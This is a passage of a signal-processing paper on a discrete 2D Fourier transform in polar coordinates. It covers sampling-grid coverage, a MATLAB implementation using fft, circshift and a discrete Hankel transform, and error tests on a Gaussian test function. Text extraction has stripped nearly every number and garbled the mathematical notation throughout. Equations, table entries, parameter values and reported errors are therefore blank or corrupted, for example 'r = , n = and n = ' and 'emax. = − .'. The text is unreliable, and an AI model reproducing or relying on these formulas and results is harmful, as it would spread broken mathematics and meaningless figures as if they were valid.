the proposed d dft can be used to approximate the continuous transform, the question becomes how well fqm calculated from the d dft in eq. ( ) approximates f jqm r ; pq n � � —the values of the continuous d ft evaluated on the sampling grid. to evaluate the inverse d dft, the process is similar. we start with the continuous fðr; cÞ, evaluate it at the sampling points and assign this value to fqm via fqm ¼ f jqm r ; pq n � � ( ) now, fpk is calculated from a scaled version of the inverse d dft, eq. ( ) that is fpk ¼ pr f� fqm � � ¼ pr xn � m¼ xm q¼�m fqme þ qm;pk ( ) to evaluate if the proposed transform can approximate the continuous transform, the question becomes how well fpk calculated from eq. ( ) approximates f jpkr jpn ; pp n � � —the values of the continuous function evaluated on the sampling grid. band-limited functions the process for band-limited functions follows the same process as outlined in the previous section, with the exception that the sampling points and scaling factors are slightly different as they are now given in terms of the band limit rather than the space limit. now consider functions in the frequency domain f q; cð Þ with an effective band limit r ; wr � . that is, we suppose that the d ft f r; cð Þ of f ðr; uÞ is band-limited, meaning that f r; cð Þ is zero for r � wr ¼ pw. the variable wr is written in this form since w would typically be quoted in units of hz (cycles per second) if using temporal units or cycles per meter if using spatial units. therefore, the multiplication by p ensures that the final units are in s� or m� . the approximate relationship between sampled yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ values of the continuous d ft f r; cð Þ and sampled values of the original continuous function f r; uð Þ was derived in the first part of the paper and is given by f jqmwr jqn ; pq n � � � p w r xn � k¼ xm p¼�m f jpk wr ; pp n � � n xm n¼�m i�njn jnmjnk jnn � � j nþ jnkð Þ e �i pnpn e þi pnqn ( ) similarly, the inverse relationship between sampled values of f r; cð Þ and sampled values of f ðr; uÞ was shown to be given by f jpk wr ; pp n � � � w r p xn � m¼ xm q¼�m f jqmwr jqn ; pq n � � n xm n¼�m injn jnkjnm jnn � � j nn j nþ jnmð Þ e �i pnqn e þi pnpn ( ) the relationships in eqs. ( ) and ( ) give relationships between the sampled values of the original function and sampled values of its d ft. to evaluate the forward d dft, we start with f r; uð Þ, evaluate it at the (bandlimited specific) sampling points and assign this value to fpk via fpk ¼ f jpk wr ; pp n � � ( ) then, fqm is calculated from the discrete transform scaled by p w r , eq. ( ), that is fqm ¼ p w r f fpk � � ¼ p w r xn � k¼ xm p¼�m fpke � qm;pk ( ) to evaluate if the proposed d dft can be used to approximate the continuous transform, the question is how well fqm calculated from eq. ( ) approximates f jqmwr jqn ; pq n � � , which are the values of the continuous d ft, evaluated on the sampling grid. the evaluation of the inverse transform for the band-limited function proceeds similarly by comparing values obtained from the inverse d dft to the values obtained by sampling the continuous function directly. the relationships given by eqs. ( ), ( ), ( ) and ( ), were the motivating definition of a d dft in polar coordinates, defined in the first part of this two-part paper. in the context of this second part of the two-part paper, they are also the relationships that permit the use of the discrete transform to approximate the continuous transform at the specified sampling points. they are also the relationships that permit the examination of whether the discrete quantities fpk and fqm calculated via the proposed d dft are in fact reasonable approximations to the sampled values of the continuous functions, as stated in the objectives of the paper. discretization points and sampling grid the transforms defined in eqs. ( ) and ( ) can be applied to any matrix fpk to yield its forward transform fqm, which can then be transformed backwards by using the inverse transform. however, if these same discrete transforms are to be used for the purpose of approximating a continuous d ft, then these transforms need to be applied to the yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ specific sampled values of the continuous functions in both space and frequency domains, as shown in eqs. ( ), ( ) and ( ). the relationships in eqs. ( ) and ( ) define the sampling points that need to be used and it is noted that the points are defined differently based on whether we start with the assumption of a space or band limited function. these specific sampling points imply a specific sampling grid for the function. in this section, the sampling grid (its coverage and density in d) is analyzed. sampling points for a space-limited function, we assume that the original function of interest is defined over continuous r; uð Þ space where � r � r and � u � p. the discrete sampling spaces used for radial and angular sampling points in regular~r space r; uð Þ and ~v frequency r; cð Þ space are defined as rpk ¼ jpkr jpn up ¼ p p n ( ) and rqm ¼ jqm r cq ¼ q p n ( ) for a band limited function, the function is assumed band-limited to � r � wr, � c � p. the sampling space used for radial and angular sampling points in regular ~v frequency space r; cð Þ and~r space r; uð Þ for a bandlimited function is defined as rpk ¼ jpk wr up ¼ p p n ( ) and rqm ¼ jqmwr jqn cq ¼ q p n ( ) clearly, the density of the sampling points depends on the numbers of points chosen, that is on n and n . also clear is the fact that the grid is not equispaced in the radial variable. the sampling grid for a space-limited function are plotted below to enable visualization. in the first instance, the polar grids are plotted for the case r ¼ , n ¼ and n ¼ . these are shown in space (r space) and frequency (ρ space) in figs. and respectively. it should be noted that although we refer the grids in this article as polar grids, they are not true polar grids in the sense of equispaced sampling in the radial and angular coordinates. clearly, the grids in figs. and are fairly sparse, but the low values of n and n have been chosen so that the structure of the sampling points can be easily seen. it can be observed that there is a hole at the center area in both domains which is caused by the special sampling points. for higher values of the n and n , the grid becomes fairly dense, obtaining good coverage of both spaces, but details are harder to observe. to demonstrate, yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the polar grids are plotted for the case r = , n ¼ and n ¼ . these are shown in figs. and respectively. from figs. and , by choosing higher values of n and n , the sampling grid becomes denser, however there is still a gap in the center area. the sampling grids for band-limited functions are not plotted here since the sample grid for a band-limited function has the same shape as with space limited function but the domains are reversed. sample grid analysis from part i of the paper, it was shown that the d-ft can be interpreted as a dft in the angular direction, a dht in the radial direction and then an idft in the angular direction. hence, the sample size in the angular direction could have been decided by the nyquist sampling theorem (shannon, ), which states that fs > fmax ( ) where fs is the sample frequency and fmax is the highest frequency or band limit. in the radial direction, the necessary relationship for the dht is given by baddour & chouinard ( ) wrr ¼ jnn ( ) figure spatial sampling grid for a space-limited function with r = , n = and n = . full-size doi: . /peerj-cs. /fig- yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ where wr is the effective band-limit, r is the effective space limit and jnn is the nth zero of jn rð Þ. for the d ft, since �m � p � m, the order of the bessel zero ranges from �m to m, the required relationship becomes minðjpn Þ � wrr ( ) the relationships jnn ¼ j�nn and j n < j� n < j� n < … < j�mn are valid (lozier, ), hence eq. ( ) can be written as j n � wrr ( ) it is pointed out in baddour ( ) and guizar-sicairos & gutiérrez-vega ( ) that the zeros of jn zð Þ are almost evenly spaced at intervals of p and that the spacing becomes exactly p in the limit as z ! . the reader unfamiliar with bessel functions is directed to references (bracewell, ; lozier, ). in fact, it is shown in dutt & rokhlin ( ) that a simple asymptotic form for the bessel function is given by jn zð Þ � ffiffiffiffiffiffi pz r cos z � n þ � � p � � ( ) figure frequency space sampling grid for a space-limited function with r = , n = and n = . full-size doi: . /peerj-cs. /fig- yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ therefore, an approximation to the bessel zero, jnk is given by jnk � k þ n � � � p ( ) hence, eq. ( ) can be written to choose n approximately as n p � wrr ¼ pwr ) n � wr ( ) where the reader is reminded that the units of w is m− (the space equivalent of hz). n =r is the spatial sampling frequency and we see that eq. ( ) effectively makes the same statement as eq. ( ), as it should. intuitively, more sample points lead to more information captured, which gives an expectation that increasing n or n individually will give a better sampling grid coverage. however, it can be seen from figs. – that there is a gap in the center of the sample grid. from eqs. ( ) and ( ), the area of the gap in the center is related to the ranges of p and k, that is n and n . in the sections below, it is assumed that the sampling theorems are already satisfied (that is, an appropriate space and band limit is selected) and the relationship between n , n and the size of the gap will be discussed. figure spatial sampling grid for a space-limited function with r = , n = and n = . full-size doi: . /peerj-cs. /fig- yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ space-limited function in this section, it is assumed that the function is a space limited function, defined in r ½ ; r�. the sampling points are defined as eq. ( ) in the space domain and eq. ( ) in the frequency domain. in the following, a relationship between n , n and the area of the gap in both domains is discussed. sample grid in the space domain in the space domain, the effective limit in the space domain, r, is fixed. to analyze how the values of n and n affect the coverage of the grid in space domain, consider the following definition of ‘grid coverage’ ar ¼ pr � p�r pr ( ) where �r denotes the average radius of the gap (the hole in the middle of the grid). ar as defined in eq. ( ) is a measure of the “grid coverage” since it gives a percentage of how much of the original space limited domain area is captured by the discrete grid. for example, if the average radius of the center gap is zero, then ar would be %, that is, complete coverage. based on the observation of figs. and , the relationship figure frequency space sampling grid for a space-limited function with r = , n = and n = . full-size doi: . /peerj-cs. /fig- yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ r < r� < r� < r�m is valid. therefore, from eq. ( ), the average radius of the gap is given by �r ¼ ðr þ rm Þ ¼ j j n r þ jm jmn r � � ( ) hence, eq. ( ) for grid coverage can be written as ar ¼ � j j n þ jm jmn � � " # ( ) table shows the different values of grid coverage ar as the values of n and n are changed. from table , it can be seen that increasing n (sample size in the radial direction) tends to increase the grid coverage. since the effective space limit r is fixed, from eq. ( ) it follows that increasing n actually increases the effective band limit. however, increasing n (sample size in angular direction) will result in a bigger gap in the center of the grid, which then decreases the coverage. sample grid in the frequency domain similarly, coverage of the grid in the frequency domain is defined as ar ¼ pw r � p�r pw r ( ) where �r denotes the average radius of the gap. since �r ¼ ðr þ rm Þ ¼ ðj þ jm Þ r ( ) then, it follows that eq. ( ) for frequency domain grid coverage can be written as ar ¼ � ðj þ jm Þ r w r " # % ( ) from eq. ( ), it can be observed that the sample grid coverage in the frequency domain is affected by r, wr and m. since n ¼ m þ , in order to get a better grid coverage with a fixed wr, r and n can be adjusted. table shows the grid coverage ar for different values of r and n . from table , the conclusion for the frequency domain is that when the effective band limit is fixed, increasing r (effective space limit) tends to increase the coverage in the table spatial grid coverage, ar, with respect to different values of n and n (r is fixed). n n ar = . % ar = . % ar = . % ar = . % ar = . % ar = . % ar = . % ar = . % ar = . % ar = . % ar = . % ar = . % ar = . % ar = . % ar = . % ar = . % yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ frequency domain, while increasing n (sample size in the angular direction) decreases the coverage. however, from eq. ( ) it should be noted that to satisfy the sampling theorem, increasing r with fixed wr requires an increase in n at the same time. band-limited function in this section, we suppose that the function is an effectively band limited function, defined on r ½ ; wp�. the sampling points are defined as in eq. ( ) in the space domain and as in the frequency domain. in this subsection, the relationship between n , n and the area of the gap in both domains is discussed. sampling grid in the space domain the same definition of grid coverage in the space domain will be used as in eq. ( ). since the sampling points of a band-limited function are given by eqs. ( ) and ( ), the average radius of the gap can be defined as �r ¼ ðr þ rm Þ ¼ j wr þ jm wr � � ( ) therefore, the coverage of the grid in space domain can be written as ar¼ � ðj þ jm Þ w rr " # ( ) it can be observed that the grid coverage in the space domain of a band-limited function is the same as the grid coverage in the frequency domain of space limited function. sample grid in frequency domain the coverage of the grid in the frequency domain of a band limited function is defined by eq. ( ). with sampling points defined in eq. ( ), the average radius of the gap can be defined as �r ¼ ðr þ rm Þ ¼ j j n wr þ jm jmn wr � � ( ) the coverage of the grid in frequency domain can be written as ar ¼ � j j n þ jm jmn � � " # ( ) it can be observed that the grid coverage in the frequency domain of a band-limited function is the same as the grid coverage in the space domain of a space limited function. table frequency grid coverage, aρ, with respect to different values of r and n (wρ is fixed). n r aρ = . % aρ = . % aρ = . % aρ = . % aρ = . % aρ = . % aρ = . % aρ = . % aρ = . % aρ = . % aρ = . % aρ = . % aρ = . % aρ = . % aρ = . % aρ = . % yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ conclusion based on the discussion above, the following conclusions can be made: . increasing n (angular direction) tends to decrease the sampling grid coverage in both domains. increasing n (radial direction) tends to increase the sampling coverage in the space domain for a space-limited function and in the frequency domain for a frequency-limited function. so, if a signal changes sharply in the angular direction such that large values of n are needed, a large value of n is also needed to compensate for the effect of increasing n on the grid coverage. . for a space-limited function, if there is a lot of energy at the origin in the space domain, a larger value of n will be required to ensure that the sampling grid gets as close to the origin as possible in the space domain. if the function has a lot of energy at the origin in the frequency domain, a large value for both n and r will be required to ensure adequate grid coverage. . for a band-limited function, if there is a lot of energy at the origin in the frequency domain, a large value of n will be needed to ensure that the sample grid gets as close to the origin as possible in the frequency domain. if the function has a lot of energy at the origin in the space domain, large values for both n and wr are required. numerical computation of the transform we have already demonstrated in part i of the paper that the discrete d ft in polar coordinates can be interpreted as a dft, dht and then idft. this interpretation is quite helpful in coding the transform and in exploiting the speed of the fft (fast fourier transform) in implementing the computations. in this section, we explain how the speed of matlab’s (mathworks ) built-in code (or similar software) can be exploited to implement the d dft in polar coordinates. forward transform the values fpk can be considered as the entries in a matrix. to transform fpk ! fqm, the operation is performed as a sequence of steps which are a d dft (column-wise), followed by a scaled d dht (row-wise), finally followed by a d idft (column-wise). the reader is reminded that the range of indices is given by m; k ¼ . . . n � and n; p; q ¼ �m . . . m, where m þ ¼ n . these steps can be summarized succinctly by rewriting eq. ( ) as fqm ¼ n xm n¼�m pr i�n jnn xn � k¼ ynn m;k xm p¼�m fpke �in ppn |fflfflfflfflfflfflfflfflfflfflffl{zfflfflfflfflfflfflfflfflfflfflffl} d dft column‐wise |fflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflffl{zfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflffl} scaled d dht row‐wise e þin pqn |fflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflffl{zfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflffl} inverse d dft column‐wise ( ) yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ where the dht is defined in baddour & chouinard ( ) via the transformation matrix ynn m;k ¼ jnn j nþ jnkð Þ jn jnmjnk jnn � � � m; k � n � ( ) matlab code for the dht is described in baddour & chouinard ( ). the inverse d dft can be similarly interpreted, as shown in “inverse transform”. inverse transform the steps of the inverse d dft are the reverse of the steps outlined above for the forward d dft. for p ¼ �m . . . m and k ¼ . . . n � , eq. ( ) this can be expressed as fpk ¼ n xm n¼�m jnn i þn pr xn � m¼ ynn k;m xm q¼m fqme �i pnqn |fflfflfflfflfflfflfflfflfflfflffl{zfflfflfflfflfflfflfflfflfflfflffl} d dft ðcolumn‐wiseÞ |fflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflffl{zfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflffl} scaled d dft ðrow‐wiseÞ e þi pnpn |fflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflffl{zfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflffl} inverse d dft ðcolumn‐wiseÞ ( ) this parallels the steps taken for the continuous case, with each continuous operation (fourier series, hankel transform) replaced by its discrete counterpart (dft, dht). therefore, for both forward and inverse d-dft, the sequence of operations is a dft of each column of the starting matrix, followed by a dht of each row, a term-by-term scaling, followed by an idft of each column. this is a significant computational improvement because by interpreting the transform this way, the fast fourier transform (fft) can be used, which reduces the computational time quite significantly in comparison with a direct implementation of the summation definitions in eqs. ( ) and ( ). interpretation of the sampled forward transform in matlab terms to use the built-in matlab function fft, a few operations are required. first, we define matlab-friendly indices p ¼ p þ ðm þ Þ and n ¼ n þ ðm þ Þ so that p; n ¼ �m . . . m become p ; n ¼ . . . m þ ¼ . . . n (since m þ ¼ n ). that is, the primed variables range from . . . m þ rather than �m . . . m. hence, if the matrix f with entries fp k is defined, where p ¼ . . . n ; k ¼ . . . n � , then the first step in which is a column-wise dft can be written as the matlab-defined dft as �fn k ¼ xn p ¼ fpke � piðp � �mÞðn � �mÞ n ( ) the overbar denotes a dft. the definition of dft in matlab is actually given by the relationship �fn k ¼ xn p ¼ fp ke � piðp � Þðn � Þ n ( ) yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ since the relationship pn p ¼ fp ke � piðp � Þðn � �mÞ n ¼ pn p ¼ fpke� piðp � �mÞðn � �mÞ n is valid, we can sample the original function to obtain the discrete fpk values, put them in the matrix fp k then shift the matrix fp k by m þ along the column direction. in matlab, the function circshift a; k; dimð Þ can be used, which circularly shifts the values in array a by k positions along dimension dim. inputs k and dim must be scalars. specifically, dim ¼ indicates the columns of matrix a and dim ¼ indicates the rows of matrix a. hence, eq. ( ) can be written as �fn k ¼ fft circshift fp k; m þ ; � � ; n ; � � ( ) in matrix operations, this is equivalent to stating that each column of fp k is dft’ed to yield �fn k. the second step in eq. ( ) is a dht of order n, transforming �fn k ! �̂f n l so that the k subscript is hankel transformed to the l subscript. the overhat denotes a dht. in order to relate the order n to the index n , we need to shift �fn k by �ðm þ Þ along column direction so that the order ranges from –m to m. �̂f n l ¼ xn � k¼ jn jnkjnl jnn � � jnn j nþ jnkð Þ circshift �f n k;�ðm þ Þ; � � for n ¼ ...n ; l ¼ ...n � where n ¼ n � m þ ð Þ � ( ) by using the hankel transform matrix defined in baddour & chouinard ( ), eq. ( ) can be rewritten as �̂f n l ¼ circshift �f n k;�ðm þ Þ; � � ynn l;k � �t for n ¼ . . . n ; l ¼ . . .n � where n ¼ n � m � � ( ) in matrix operations, this states that each row of �fn k is dht’ed to yield �̂f n l. these are now scaled to give the fourier coefficients of the d dft �̂f n l ! �fn l. in order to proceed to an idft in the next step, it is necessary to shift the matrix by m þ along the column direction after scaling �fn l ¼ circshift pr jnn i�n�̂f n l; m þ ; � � for n ¼ . . . n ; l ¼ . . . n � where n ¼ n � m þ ð Þ � ( ) this last step is a d idft for each column of �fn l to obtain fql. using m þ ¼ n , and q ¼ q þ þ m, this can be written as fq l ¼ n xn n ¼ �fnle þi n �m� ð Þ p q � �mð Þ n for q ¼ :: n ; l ¼ :: n � ¼ n xn n ¼ �fn le þiðn � Þ p q � �mð Þ n ¼ circshift ifft �fn l; n ; ð Þ; � m þ ð Þ; ð Þ ( ) yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ interpretation of the sampled inverse transform in matlab terms similar to the forward transform, matlab-friendly indices q ¼ q þ ðm þ Þ and n ¼ n þ ðm þ Þ are also defined. hence, if the matrix f with entries fq l is defined, where q ¼ . . . n ; l ¼ . . . n � , it then follows that the first d dft step in eq. ( ) can be written as the matlab-defined dft as �fn l ¼ xn q ¼ fqle �iðn �m� Þ pðq � �mÞ n for n ¼ . . . n ; l ¼ . . . n � ¼ xn q ¼ fq le �iðn �m� Þ pðq � Þ n ( ) if the original function can be sampled as fql and then put into matrix fq l, then we need an circshift operation. so eq. ( ) can be written as �fn l ¼ fft circshiftðfq l; m þ ; Þ; n ; � � ( ) subsequently, a dht of order n is required, transforming �fn l ! �̂fn l so that the l subscript is hankel transformed to the k subscript. to achieve this, circshift is also needed here. �̂fn k ¼ circshift �fn l; �ðm þ Þ; ð Þ ynn k;l � �t for n ¼ . . . n ; l ¼ . . . n � where n ¼ n � m � � ( ) this is followed by a scaling operation to obtain �̂fn k ! �fn k and then a circshift by ðm þ Þ so that �fn k ¼ circshift jnn pr iþn�̂fn k; ðm þ Þ; � � for n ¼ . . . n ; k ¼ . . . n � where n ¼ n � m þ ð Þ � ( ) this last step is a d idft for each column of �fn k to get fp k. using m þ ¼ n , and p ¼ p þ , eq. ( ) can be written as fp k ¼ n xn n ¼ �f nke þi n �m� ð Þ p p � �mð Þ n for p ¼ . . . n ; k ¼ . . . n � ¼ n xn n ¼ �f n ke þi p n � ð Þ p � �mð Þ n ¼ circshift ifft �f n k; n ; � � ; �ðm þ Þ; � � ( ) in conclusion, in this section, by using the interpretation of the kernel as sequential dft, dht and idft operations, matlab (or similar software) built-in code can be used to efficiently implement the d dft algorithm in polar coordinates. numerical evaluation of the d dft in polar coordinates to approximate the continuous ft in this section, the d dft is evaluated for its ability to estimate the continuous ft at the selected special sampling points in the spatial and frequency domains. yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ method for testing the algorithm accuracy in order to test accuracy of the d-dft and d-idft to calculate approximate the continuous counterpart, the dynamic error is proposed as a metric. the dynamic error is defined as guizar-sicairos & gutiérrez-vega ( ) eðvÞ ¼ log cðvÞ � dðvÞj j max dðvÞj j � � ( ) where cðvÞ is the continuous forward or inverse d-ft and dðvÞ is the value obtained from the discrete counterpart. the dynamic error is defined as the ratio of the absolute error to the maximum amplitude of the discrete function, calculated on a log scale. therefore, a large negative value represents an accurate discrete transform. the dynamic error is used instead of the percentage error in order to avoid division by zero. precision the precision of the algorithm is an important evaluation criterion, which is tested by sequentially performing a pair of forward and inverse transforms and comparing the result to the original function. high precision indicates that numerical evaluation of the transform does not add much error. an average of the absolute error between the original function and the calculated counterpart at each sample point is used to measure the precision. it is given by e ¼ n � ð Þ n xn � ð Þ n n¼ f � f j j ( ) where f is the original function and f is the value obtained after sequentially performing a forward and then inverse transform. an ideal precision would result in the absolute error being zero. test functions in this section, three test functions are chosen to evaluate the ability of the discrete transform to approximate the continuous counterpart. the first test case is the circularly symmetric gaussian function. given that it is circularly symmetric and that the gaussian is continuous and smooth, the proposed dft is expected to perform well. the second test case is “four-term sinusoid and sinc” function, which is not symmetric in the angular direction and suffers a discontinuity in the radial direction. the third test function presents a more challenging test function, the “four-term sinusoid and modified exponential” function. in this case, the test function is not circularly symmetric and it explodes at the origin (approaches infinity at the origin). given that as shown above, the sampling grid cannot cover the area around the origin very well, a function that explodes at the origin should give more error and should provide a reasonable test case for evaluating the performance of the discrete transform. the test functions are chosen to test specific aspects of the performance of the discrete transform but also because a closed-form expression for both the function and its transform are available. this then allows a yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ numerical evaluation of the error between the quantities computed with the d dft and the quantities obtained by evaluating (sampling) the continuous (forward or inverse) transform at the grid points. gaussian the first function chosen for evaluation is a circular symmetric function which is gaussian in the radial direction. specifically, the function in the space domain is given by f ðr; uÞ ¼ e�a r ( ) where a is some real constant. since the function is circularly symmetric, the d-dft is a zeroth-order hankel transform (poularikas, ) and is given by fðr; cÞ ¼ p a e �r a ( ) the graphs for the original function and its continuous d-dft (which is also a gaussian) are plotted with a ¼ and shown in fig. . from fig. , the function is circular symmetric and fairly smooth in the radial direction. moreover, the function can be considered as either an effectively space-limited function or an effectively band-limited function. for the purposes of testing it, it shall be considered as a space-limited function and eqs. ( ) and ( ) will be used to proceed with the forward and inverse transform in sequence. to perform the transform, the following variables need to be chosen: n , r and n . in the angular direction, since the function in the spatial domain is circularly symmetric, n can be chosen to be small. thus, n ¼ is chosen. in the radial direction, from plotting the function, it can be seen that the effective space limit can be taken to be r ¼ and the effective band limit can be taken to be wr ¼ . from eq. ( ), j n � r wr ¼ . therefore, n ¼ is chosen (we could also have obtained a rough estimate of n from eq. ( )). however, most of the energy of the figure (a) original function (gaussian) and (b) its continuous d-dft (which is also a gaussian). full-size doi: . /peerj-cs. /fig- yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ function in both the space and frequency domains is located in the center near the origin. based on the discussion in “conclusion”, relatively large values of r and wr are needed. the effective space limit r ¼ and effective band-limit wp ¼ are thus chosen, which gives j n � r wr ¼ . therefore n ¼ is chosen in order to satisfy this constraint. both cases discussed here (n ¼ and n ¼ ) are tested in following. forward transform test results with r ¼ , n ¼ are shown in figs. and . figure shows the sampled continuous forward transform and the discrete forward transform. figure shows the error between the sampled values of the continuous transform and the discretely calculated values. from fig. , it can be observed that the error gets bigger at the center, which is as expected because the sampling grid shows that the sampling points can never attain the origin. the maximum value of the error is emax ¼ � : db and this occurs at the center. the average error is eavg: ¼ � : db. error test results with r ¼ , n ¼ are shown in fig. . similar to the previous case, the error gets larger at the center, as expected. however, the maximum value of the error is emax ¼ � : db and this occurs at the center. the average value of the error is eavg: ¼ � : db. clearly, the test with r ¼ , n ¼ gives a better approximation, which verifies the discussion in “conclusion”. with r ¼ , table shows the errors (max and average error) with respect to different value of n and n . the trends as functions of n and n are shown as plots in figs. and . from fig. , it can be seen that when n individually (n is fixed at n ¼ ) is less than the minimum of obtained from the sampling theorem, increasing n will lead to smaller errors, as expected. when n is bigger than the sampling-theorem threshold figure (a) sampled continuous transform and (b) discrete forward transform for a gaussian function with r = and n = . full-size doi: . /peerj-cs. /fig- yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ of , increasing n still decreases the error which verifies the discussion about sample grid coverage in “conclusion”. increasing n tends to increase the sample grid coverage and capture more information at the center area and thus leads to smaller errors. from fig. , increasing n alone (i.e., without a corresponding increase in n ) leads to larger errors, both errormax and erroraverage. although at first counterintuitive, this result is actually reasonable because the function is radially symmetric which implies that n ¼ should be sufficient based on the sampling theorem for the angular direction. figure error between the sampled values of the continuous transform and the discretely calculated values for a gaussian function with r = and n = . full-size doi: . /peerj-cs. /fig- figure error between the sampled values of the continuous transform and the discretely calculated values for a gaussian function with r = and n = .full-size doi: . /peerj-cs. /fig- yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ therefore, increasing n will not lead to a better approximation. moreover, from the discussion of the sample grid coverage in “conclusion”, the sampling grid coverage in both domains gets worse when n gets bigger because more information from the center is lost. this problem can be solved by increasing n at the same time, but it could be computationally time consuming. therefore, choosing n properly is very important from the standpoint of accuracy and computational efficiency. figure error trend between the sampled values of the continuous transform and the discretely calculated values for a gaussian function, as a function of n . full-size doi: . /peerj-cs. /fig- table error (db) of forward transform of gaussian function with r = , different value of n and n . n n emax. = − . emax. = − . emax. = − . emax. = − . emax. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . emax. = − . emax. = − . emax. = − . emax. = − . emax. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . emax. = − . emax. = − . emax. = − . emax. = − . emax. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . emax. = . emax. = . emax. = − . emax. = − . emax. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . emax. = . emax. = . emax. = . emax. = . emax. = . eavg. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ inverse transform test results for the inverse transform with r ¼ , n ¼ are shown in figs. and . figure shows the sampled continuous inverse transform and discrete inverse transform and fig. shows the error between the sampled continuous and discretely calculated values. figure (a) sampled continuous inverse transform and (b) discrete inverse transform for the gaussian function for r = and n = . full-size doi: . /peerj-cs. /fig- figure error trend between the sampled values of the continuous transform and the discretely calculated values for a gaussian function, as a function of n . full-size doi: . /peerj-cs. /fig- yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ similar to the case for the forward transform, the error gets larger at the center, which is as expected because the sampling grid shows that the sampling points never attain the center. the maximum value of the error is emax ¼ : db and this occurs at the center. the average of the error is eavg: ¼ � : db. error test results for the inverse transform with r ¼ , n ¼ are shown in fig. . in this case, the maximum value of the error is emax ¼ � : db and this occurs at the center. the average of the error is eavg: ¼ � : db. table shows the errors with respect to different value of n and n , from which figs. and demonstrate the trend. figure error between the sampled continuous inverse transform and discrete inverse transform for the gaussian function for r = and n = . full-size doi: . /peerj-cs. /fig- figure error between the sampled continuous inverse transform and discrete inverse transform for the gaussian function for r = and n = . full-size doi: . /peerj-cs. /fig- yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ from fig. it can be observed that increasing n tends to improve the result but not significantly. this could be explained by the discussion for r ¼ , n ¼ that with fixed r and wr, increasing n will not allow the sampling grid in the frequency domain to get any closer to the origin to capture more information. from fig. , increasing n (with fixed n ¼ ) leads to a worse approximation which verifies the discussion for r ¼ , n ¼ . figure error trend between the sampled values of the continuous inverse transform and the discretely calculated values for a gaussian function, as a function of n . full-size doi: . /peerj-cs. /fig- table error (db) of inverse transform of gaussian function with r = , different value of n and n . n n emax. = − . emax. = − . emax. = − . emax. = − . emax. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . emax. = − . 